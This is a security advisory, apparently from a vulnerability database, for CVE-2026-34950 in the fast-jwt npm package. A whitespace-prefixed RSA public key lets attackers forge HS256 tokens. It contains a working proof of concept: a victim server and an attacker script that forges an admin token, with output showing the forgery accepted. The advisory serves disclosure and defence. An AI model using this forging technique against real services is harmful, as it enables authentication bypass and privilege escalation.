GHSA-MVF2-F6GM-W987

Vulnerability from github – Published: 2026-04-02 20:37 – Updated: 2026-04-07 17:06
VLAI?
Summary
fast-jwt: Incomplete fix for CVE-2023-48223: JWT Algorithm Confusion via Whitespace-Prefixed RSA Public Key
Details

Summary

The fix for GHSA-c2ff-88x2-x9pg (CVE-2023-48223) is incomplete. The publicKeyPemMatcher regex in fast-jwt/src/crypto.js uses a ^ anchor that is defeated by any leading whitespace in the key string, re-enabling the exact same JWT algorithm confusion attack that the CVE patched.

Details

The fix for CVE-2023-48223 (https://github.com/nearform/fast-jwt/commit/15a6e92, v3.3.2) changed the public key matcher from a plain string used with .includes() to a regex used with .match():

  // Before fix (vulnerable to original CVE)
  const publicKeyPemMatcher = '-----BEGIN PUBLIC KEY-----'
  // .includes() matched anywhere in the string — not vulnerable to whitespace

  // After fix (current code, line 28)
  const publicKeyPemMatcher = /^-----BEGIN(?: (RSA))? PUBLIC KEY-----/
  // ^ anchor requires match at position 0 — defeated by leading whitespace

  In performDetectPublicKeyAlgorithms()
  (https://github.com/nearform/fast-jwt/blob/0ff14a687b9af786bd3ffa870d6febe6e1f13aaa/src/crypto.js#L126-L137):

  function performDetectPublicKeyAlgorithms(key) {
    const publicKeyPemMatch = key.match(publicKeyPemMatcher)  // no .trim()!

    if (key.match(privateKeyPemMatcher)) {
      throw ...
    } else if (publicKeyPemMatch && publicKeyPemMatch[1] === 'RSA') {
      return rsaAlgorithms      // ← correct path: restricts to RS/PS algorithms
    } else if (!publicKeyPemMatch && !key.includes(publicKeyX509CertMatcher)) {
      return hsAlgorithms        // ← VULNERABLE: RSA key falls through here
    }

When the key string has any leading whitespace (space, tab, \n, \r\n), the ^ anchor fails, publicKeyPemMatch is null, and the RSA public key is classified as an HMAC secret (hsAlgorithms). The attacker can then sign an HS256 token using the public key as the HMAC secret — the exact same attack as CVE-2023-48223.

Notably, the private key detection function does call .trim() before matching https://github.com/nearform/fast-jwt/blob/0ff14a687b9af786bd3ffa870d6febe6e1f13aaa/src/crypto.js#L79: const pemData = key.trim().match(privateKeyPemMatcher) // trims — not vulnerable

The public key path does not. This inconsistency is the root cause.

Leading whitespace in PEM key strings is common in real-world deployments: - PostgreSQL/MySQL text columns often return strings with leading newlines - YAML multiline strings (|, >) can introduce leading whitespace - Environment variables with embedded newlines - Copy-paste into configuration files

PoC

Victim server (server.js):

  const http = require('node:http');
  const { generateKeyPairSync } = require('node:crypto');
  const fs = require('node:fs');
  const path = require('node:path');
  const { createSigner, createVerifier } = require('fast-jwt');

  const port = 3000;

  // Generate RSA key pair
  const { publicKey, privateKey } = generateKeyPairSync('rsa', { modulusLength: 2048 });
  const publicKeyPem = publicKey.export({ type: 'pkcs1', format: 'pem' });
  const privateKeyPem = privateKey.export({ type: 'pkcs8', format: 'pem' });

  // Simulate real-world scenario: key retrieved from database with leading newline
  const publicKeyFromDB = '\n' + publicKeyPem;

  // Write public key to disk so attacker can recover it
  fs.writeFileSync(path.join(__dirname, 'public_key.pem'), publicKeyFromDB);

  const server = http.createServer((req, res) => {
    const url = new URL(req.url, `http://localhost:${port}`);

    // Endpoint to generate a JWT token with admin: false
    if (url.pathname === '/generateToken') {
      const payload = { admin: false, name: url.searchParams.get('name') || 'anonymous' };
      const signSync = createSigner({ algorithm: 'RS256', key: privateKeyPem });
      const token = signSync(payload);
      res.writeHead(200, { 'Content-Type': 'application/json' });
      res.end(JSON.stringify({ token }));
      return;
    }

    // Endpoint to check if you are the admin or not
    if (url.pathname === '/checkAdmin') {
      const token = url.searchParams.get('token');
      try {
        const verifySync = createVerifier({ key: publicKeyFromDB });
        const payload = verifySync(token);
        res.writeHead(200, { 'Content-Type': 'application/json' });
        res.end(JSON.stringify(payload));
      } catch (err) {
        res.writeHead(401, { 'Content-Type': 'application/json' });
        res.end(JSON.stringify({ error: err.message }));
      }
      return;
    }

    res.writeHead(404);
    res.end('Not found');
  });

  server.listen(port, () => console.log(`Server running on http://localhost:${port}`));

Attacker script (attacker.js):

  const { createHmac } = require('node:crypto');
  const fs = require('node:fs');
  const path = require('node:path');

  const serverUrl = 'http://localhost:3000';

  async function main() {
    // Step 1: Get a legitimate token
    const res = await fetch(`${serverUrl}/generateToken?name=attacker`);
    const { token: legitimateToken } = await res.json();
    console.log('Legitimate token payload:',
      JSON.parse(Buffer.from(legitimateToken.split('.')[1], 'base64url')));

    // Step 2: Recover the public key
    // (In the original advisory: python3 jwt_forgery.py token1 token2)
    const publicKey = fs.readFileSync(path.join(__dirname, 'public_key.pem'), 'utf8');

    // Step 3: Forge an HS256 token with admin: true
    // (In the original advisory: python jwt_tool.py --exploit k -pk public_key token)
    const header = Buffer.from(JSON.stringify({ alg: 'HS256', typ: 'JWT' })).toString('base64url');
    const payload = Buffer.from(JSON.stringify({
      admin: true, name: 'attacker',
      iat: Math.floor(Date.now() / 1000),
      exp: Math.floor(Date.now() / 1000) + 3600
    })).toString('base64url');
    const signature = createHmac('sha256', publicKey)
      .update(header + '.' + payload).digest('base64url');
    const forgedToken = header + '.' + payload + '.' + signature;

    // Step 4: Present forged token to /checkAdmin
    // 4a. Legitimate RS256 token — REJECTED
    const legRes = await fetch(`${serverUrl}/checkAdmin?token=${encodeURIComponent(legitimateToken)}`);
    console.log('Legitimate RS256 token:', legRes.status, await legRes.json());

    // 4b. Forged HS256 token — ACCEPTED
    const forgedRes = await fetch(`${serverUrl}/checkAdmin?token=${encodeURIComponent(forgedToken)}`);
    console.log('Forged HS256 token:', forgedRes.status, await forgedRes.json());
  }

  main().catch(console.error);

Running the PoC: # Terminal 1 node server.js

# Terminal 2 node attacker.js

Output: Legitimate token payload: { admin: false, name: 'attacker', iat: 1774307691 } Legitimate RS256 token: 401 { error: 'The token algorithm is invalid.' } Forged HS256 token: 200 { admin: true, name: 'attacker', iat: 1774307691, exp: 1774311291 }

The legitimate RS256 token is rejected (the key is misclassified so RS256 is not in the allowed algorithms), while the attacker's forged HS256 token is accepted with admin: true.

Impact

Applications using the RS256 algorithm, a public key with any leading whitespace before the PEM header, and calling the verify function without explicitly providing an algorithm, are vulnerable to this algorithm confusion attack which allows attackers to sign arbitrary payloads which will be accepted by the verifier. This is a direct bypass of the fix for CVE-2023-48223 / GHSA-c2ff-88x2-x9pg. The attack requirements are identical to the original CVE: the attacker only needs knowledge of the server's RSA public key (which is public by definition).

Severity ?
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 6.1.0"
      },
      "package": {
        "ecosystem": "npm",
        "name": "fast-jwt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "6.2.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34950"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-327"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-02T20:37:54Z",
    "nvd_published_at": "2026-04-06T16:16:38Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n The fix for GHSA-c2ff-88x2-x9pg (CVE-2023-48223) is incomplete. The publicKeyPemMatcher regex in fast-jwt/src/crypto.js uses a ^ anchor that is defeated by any leading whitespace in the key string, re-enabling the exact same JWT algorithm confusion attack that the CVE patched.\n\n### Details\n The fix for CVE-2023-48223 (https://github.com/nearform/fast-jwt/commit/15a6e92, v3.3.2) changed the public key matcher from a\n  plain string used with .includes() to a regex used with .match():\n\n```\n  // Before fix (vulnerable to original CVE)\n  const publicKeyPemMatcher = \u0027-----BEGIN PUBLIC KEY-----\u0027\n  // .includes() matched anywhere in the string \u2014 not vulnerable to whitespace\n\n  // After fix (current code, line 28)\n  const publicKeyPemMatcher = /^-----BEGIN(?: (RSA))? PUBLIC KEY-----/\n  // ^ anchor requires match at position 0 \u2014 defeated by leading whitespace\n\n  In performDetectPublicKeyAlgorithms()\n  (https://github.com/nearform/fast-jwt/blob/0ff14a687b9af786bd3ffa870d6febe6e1f13aaa/src/crypto.js#L126-L137):\n\n  function performDetectPublicKeyAlgorithms(key) {\n    const publicKeyPemMatch = key.match(publicKeyPemMatcher)  // no .trim()!\n\n    if (key.match(privateKeyPemMatcher)) {\n      throw ...\n    } else if (publicKeyPemMatch \u0026\u0026 publicKeyPemMatch[1] === \u0027RSA\u0027) {\n      return rsaAlgorithms      // \u2190 correct path: restricts to RS/PS algorithms\n    } else if (!publicKeyPemMatch \u0026\u0026 !key.includes(publicKeyX509CertMatcher)) {\n      return hsAlgorithms        // \u2190 VULNERABLE: RSA key falls through here\n    }\n\n```\n  When the key string has any leading whitespace (space, tab, \\n, \\r\\n), the ^ anchor fails, publicKeyPemMatch is null, and the RSA\n  public key is classified as an HMAC secret (hsAlgorithms). The attacker can then sign an HS256 token using the public key as the\n  HMAC secret \u2014 the exact same attack as CVE-2023-48223.\n\n  Notably, the private key detection function does call .trim() before matching\n  https://github.com/nearform/fast-jwt/blob/0ff14a687b9af786bd3ffa870d6febe6e1f13aaa/src/crypto.js#L79:\nconst pemData = key.trim().match(privateKeyPemMatcher)  // trims \u2014 not vulnerable\n\n  The public key path does not. This inconsistency is the root cause.\n\n  Leading whitespace in PEM key strings is common in real-world deployments:\n  - PostgreSQL/MySQL text columns often return strings with leading newlines\n  - YAML multiline strings (|, \u003e) can introduce leading whitespace\n  - Environment variables with embedded newlines\n  - Copy-paste into configuration files\n\n### PoC\n Victim server (server.js):\n\n```\n  const http = require(\u0027node:http\u0027);\n  const { generateKeyPairSync } = require(\u0027node:crypto\u0027);\n  const fs = require(\u0027node:fs\u0027);\n  const path = require(\u0027node:path\u0027);\n  const { createSigner, createVerifier } = require(\u0027fast-jwt\u0027);\n\n  const port = 3000;\n\n  // Generate RSA key pair\n  const { publicKey, privateKey } = generateKeyPairSync(\u0027rsa\u0027, { modulusLength: 2048 });\n  const publicKeyPem = publicKey.export({ type: \u0027pkcs1\u0027, format: \u0027pem\u0027 });\n  const privateKeyPem = privateKey.export({ type: \u0027pkcs8\u0027, format: \u0027pem\u0027 });\n\n  // Simulate real-world scenario: key retrieved from database with leading newline\n  const publicKeyFromDB = \u0027\\n\u0027 + publicKeyPem;\n\n  // Write public key to disk so attacker can recover it\n  fs.writeFileSync(path.join(__dirname, \u0027public_key.pem\u0027), publicKeyFromDB);\n\n  const server = http.createServer((req, res) =\u003e {\n    const url = new URL(req.url, `http://localhost:${port}`);\n\n    // Endpoint to generate a JWT token with admin: false\n    if (url.pathname === \u0027/generateToken\u0027) {\n      const payload = { admin: false, name: url.searchParams.get(\u0027name\u0027) || \u0027anonymous\u0027 };\n      const signSync = createSigner({ algorithm: \u0027RS256\u0027, key: privateKeyPem });\n      const token = signSync(payload);\n      res.writeHead(200, { \u0027Content-Type\u0027: \u0027application/json\u0027 });\n      res.end(JSON.stringify({ token }));\n      return;\n    }\n\n    // Endpoint to check if you are the admin or not\n    if (url.pathname === \u0027/checkAdmin\u0027) {\n      const token = url.searchParams.get(\u0027token\u0027);\n      try {\n        const verifySync = createVerifier({ key: publicKeyFromDB });\n        const payload = verifySync(token);\n        res.writeHead(200, { \u0027Content-Type\u0027: \u0027application/json\u0027 });\n        res.end(JSON.stringify(payload));\n      } catch (err) {\n        res.writeHead(401, { \u0027Content-Type\u0027: \u0027application/json\u0027 });\n        res.end(JSON.stringify({ error: err.message }));\n      }\n      return;\n    }\n\n    res.writeHead(404);\n    res.end(\u0027Not found\u0027);\n  });\n\n  server.listen(port, () =\u003e console.log(`Server running on http://localhost:${port}`));\n```\n\n  Attacker script (attacker.js):\n\n```\n  const { createHmac } = require(\u0027node:crypto\u0027);\n  const fs = require(\u0027node:fs\u0027);\n  const path = require(\u0027node:path\u0027);\n\n  const serverUrl = \u0027http://localhost:3000\u0027;\n\n  async function main() {\n    // Step 1: Get a legitimate token\n    const res = await fetch(`${serverUrl}/generateToken?name=attacker`);\n    const { token: legitimateToken } = await res.json();\n    console.log(\u0027Legitimate token payload:\u0027,\n      JSON.parse(Buffer.from(legitimateToken.split(\u0027.\u0027)[1], \u0027base64url\u0027)));\n\n    // Step 2: Recover the public key\n    // (In the original advisory: python3 jwt_forgery.py token1 token2)\n    const publicKey = fs.readFileSync(path.join(__dirname, \u0027public_key.pem\u0027), \u0027utf8\u0027);\n\n    // Step 3: Forge an HS256 token with admin: true\n    // (In the original advisory: python jwt_tool.py --exploit k -pk public_key token)\n    const header = Buffer.from(JSON.stringify({ alg: \u0027HS256\u0027, typ: \u0027JWT\u0027 })).toString(\u0027base64url\u0027);\n    const payload = Buffer.from(JSON.stringify({\n      admin: true, name: \u0027attacker\u0027,\n      iat: Math.floor(Date.now() / 1000),\n      exp: Math.floor(Date.now() / 1000) + 3600\n    })).toString(\u0027base64url\u0027);\n    const signature = createHmac(\u0027sha256\u0027, publicKey)\n      .update(header + \u0027.\u0027 + payload).digest(\u0027base64url\u0027);\n    const forgedToken = header + \u0027.\u0027 + payload + \u0027.\u0027 + signature;\n\n    // Step 4: Present forged token to /checkAdmin\n    // 4a. Legitimate RS256 token \u2014 REJECTED\n    const legRes = await fetch(`${serverUrl}/checkAdmin?token=${encodeURIComponent(legitimateToken)}`);\n    console.log(\u0027Legitimate RS256 token:\u0027, legRes.status, await legRes.json());\n\n    // 4b. Forged HS256 token \u2014 ACCEPTED\n    const forgedRes = await fetch(`${serverUrl}/checkAdmin?token=${encodeURIComponent(forgedToken)}`);\n    console.log(\u0027Forged HS256 token:\u0027, forgedRes.status, await forgedRes.json());\n  }\n\n  main().catch(console.error);\n```\n\n  Running the PoC:\n  # Terminal 1\n  node server.js\n\n  # Terminal 2\n  node attacker.js\n\n  Output:\n  Legitimate token payload: { admin: false, name: \u0027attacker\u0027, iat: 1774307691 }\n  Legitimate RS256 token: 401 { error: \u0027The token algorithm is invalid.\u0027 }\n  Forged HS256 token: 200 { admin: true, name: \u0027attacker\u0027, iat: 1774307691, exp: 1774311291 }\n\n  The legitimate RS256 token is rejected (the key is misclassified so RS256 is not in the allowed algorithms), while the attacker\u0027s\n  forged HS256 token is accepted with admin: true.\n\n\n### Impact\nApplications using the RS256 algorithm, a public key with any leading whitespace before the PEM header, and calling the verify\nfunction without explicitly providing an algorithm, are vulnerable to this algorithm confusion attack which allows attackers to\nsign arbitrary payloads which will be accepted by the verifier.\nThis is a direct bypass of the fix for CVE-2023-48223 / GHSA-c2ff-88x2-x9pg. The attack requirements are identical to the original\nCVE: the attacker only needs knowledge of the server\u0027s RSA public key (which is public by definition).",
  "id": "GHSA-mvf2-f6gm-w987",
  "modified": "2026-04-07T17:06:17Z",
  "published": "2026-04-02T20:37:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nearform/fast-jwt/security/advisories/GHSA-mvf2-f6gm-w987"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34950"
    },
    {
      "type": "ADVISORY",
      "url": "https://github.com/advisories/GHSA-c2ff-88x2-x9pg"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nearform/fast-jwt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fast-jwt: Incomplete fix for CVE-2023-48223: JWT Algorithm Confusion via Whitespace-Prefixed RSA Public Key"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.